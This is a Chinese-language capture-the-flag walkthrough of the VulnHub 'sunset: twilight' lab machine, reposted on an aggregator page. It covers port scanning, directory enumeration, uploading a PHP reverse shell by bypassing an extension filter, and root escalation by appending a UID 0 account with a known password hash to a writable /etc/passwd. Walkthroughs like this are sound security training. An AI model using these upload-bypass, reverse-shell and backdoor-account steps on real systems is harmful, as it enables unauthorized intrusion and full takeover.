当前位置: 首页 > news >正文

sunset: twilight靶场

news 2025/9/1 6:29:46

sunset: twilight

来自 <sunset: twilight ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.145

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.145

22/tcp - SSH (OpenSSH 7.9p1 Debian 10)

  • 版本信息:OpenSSH 7.9p1,Debian 10 (Buster) 默认版本。
  • 潜在问题:弱口令/暴力破解,已知版本的远程代码执行漏洞可能较少,但可用于 爆破登录,获取用户凭证。

25/tcp - SMTP (Exim)

  • 服务器:Exim smtpd
  • 支持命令:AUTH、PIPELINING、CHUNKING,意味着支持邮件中继。
  • 潜在问题:
    • 开放中继 → 可测试是否允许未认证发件。
    • 漏洞历史:Exim 曾多次爆出 RCE 漏洞(例如 CVE-2019-15846)。

80/tcp - HTTP (Apache 2.4.38)

  • 系统:Apache 2.4.38 (Debian 10 默认版本)。
  • 返回结果:页面无标题,可能是默认站点或未配置。
  • 攻击面:
    • 目录扫描 → 寻找敏感路径(/phpmyadmin、/uploads 等)。
    • 已知漏洞 → Apache 2.4.38 存在多项 DoS / 权限提升漏洞。

139/445/tcp - SMB (Samba 4.9.5-Debian)

  • 提供 SMB 文件共享。
  • 信息泄露:
    • NetBIOS 名称:TWILIGHT
    • 工作组:WORKGROUP
    • 安全模式:消息签名未启用(危险)。
  • 攻击面:
    • 匿名共享 → 可尝试 smbclient -L 枚举。
    • Samba 4.9.x 存在漏洞(远程代码执行 CVE-2019-10197、信息泄露)。

2121/tcp - FTP (pyftpdlib 1.5.6)

  • 支持 匿名登录
  • 已发现文件:22253251-65325.twilight(可能是提示信息或关键凭证)。
  • 攻击面:
    • 匿名访问 → 枚举更多文件、尝试上传 webshell(若有写权限)。
    • pyftpdlib 默认情况下没有特别强的安全限制。

3306/tcp - MySQL (MariaDB 10.3.22)

  • 信息:
    • 认证插件:mysql_native_password
    • 已泄露 Salt:Te!p4Ooc#!x\Te}gi\o<` → 可用来做密码爆破。
  • 攻击面:
    • 弱口令爆破。
    • 若存在 Web 应用关联,可能通过数据库注入拿到权限。

8080/tcp & 63525/tcp - HTTP (PHP CLI Web Server)

  • 标识:Easy File Sharing Web Server 登录页面。
  • 攻击面:
    • 可能是弱口令/默认口令后台。
    • 该类文件共享系统常有 任意文件上传 / RCE 漏洞
    • http-open-proxy 显示可能存在代理功能 → 可被利用作跳板。

4,访问80端口开放的http服务

再扫描其子目录

dirsearch -u http://192.168.23.145 -x 403,404  

存在一个子目录,访问之

http://192.168.23.145/gallery/

允许上传文件,这里就上传kali自带的反弹shell木马

5,复制并且编辑木马反弹的IP和端口

cp /usr/share/webshells/php/php-reverse-shell.php shell.php

mousepad shell.php

这里只允许上传jpg文件,直接上传php文件会被拦截。这里就使用burpsuite,先上传shell.jpg再修改其后缀名

但是这里没有显示上传的文件再哪里,这就需要我们接续使用gobuster枚举扫描出来

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -u http://192.168.23.145/gallery/   

http://192.168.23.145/gallery/original/

点击shell.php成功触发反弹shell,与此同时kali攻击机需要打开对4444端口的监听

成功getshell

6,python脚本获取一个可交互式脚本,再信息收集一下

python3 -c "import pty;pty.spawn('/bin/bash')"

再看看sudo提权操作是否可行

sudo命令需要密码,操作失败。但是发/etc/passwd所有用户可读可写

先在攻击机上生成一个密码 hash:
openssl passwd -1 123456

在靶机上编辑 /etc/passwd,添加一行:
echo 'hacker:$1$WIbcC9hq$kgWIRfc1/pdMOlvEXwc6K0:0:0:root:/root:/bin/bash' >> /etc/passwd

字段解释:

  • hacker → 用户名
  • :0:0: → UID=0、GID=0,即 root 权限
  • /root → home 目录
  • /bin/bash → shell

保存后你就可以直接登录:
su hacker

成功提权成为root用户,得到flag

http://www.xdnf.cn/news/1409077.html

相关文章:

  • 利用ms-swift微调和百炼平台微调大模型
  • FTP - 学习/实践
  • 【学习笔记】LLM Interview(Agent相关)
  • (附源码)基于Vue的教师档案管理系统的设计与实现
  • 安装Android Studio
  • centos 7 安装docker、docker-compose教程
  • SketchUp Pro 2024 Mac 3D建模 草图设计大师
  • Redis八股小记
  • 【了解下TJ、TC、TB、TT、TA、qJA、qJC、qJB、YJB、YJT】
  • Asible——将文件部署到受管主机和管理复杂的Play和Playbook
  • [linux仓库]解剖Linux内核:文件描述符(fd)的‘前世今生’与内核数据结构探秘
  • 编写一个用scala写的spark程序从本地读取数据,写到本地
  • 【ArcGIS微课1000例】0150:如何根据地名获取经纬度坐标
  • openssl使用SM2进行数据加密和数据解密
  • 科普:requirements.txt 和 environment.yml
  • Labview使用modbus或S7与PLC通信
  • Machine Learning HW3 report:图像分类(Hongyi Lee)
  • 《深入剖析Kafka分布式消息队列架构奥秘》之Springboot集成Kafka
  • 中级统计师-统计实务-第四章 专业统计
  • 嵌入式ARM程序高级调试技能:20.qemu arm ARM Linux 上 addr2line 的实际应用示例
  • 【重学MySQL】九十五、Linux 下 MySQL 大小写规则设置详解
  • CF每日3题(1500-1600)
  • 阿里云创建自己的博客,部署wordpress
  • 基于Matlab元胞自动机的强场电离过程模拟与ADK模型分析
  • Scikit-learn Python机器学习 - 数据集的划分
  • 网格图--Day03--网格图DFS--2658. 网格图中鱼的最大数目,1034. 边界着色,1020. 飞地的数量
  • Cartographer中的gflag与lua文件
  • 【开题答辩全过程】以 基于Java的城市公交查询系统设计与实现为例,包含答辩的问题和答案
  • 记录测试环境hertzbeat压测cpu高,oom问题排查。jvm,mat,visulavm
  • 浏览器和 node 操作文件的 api 以及区别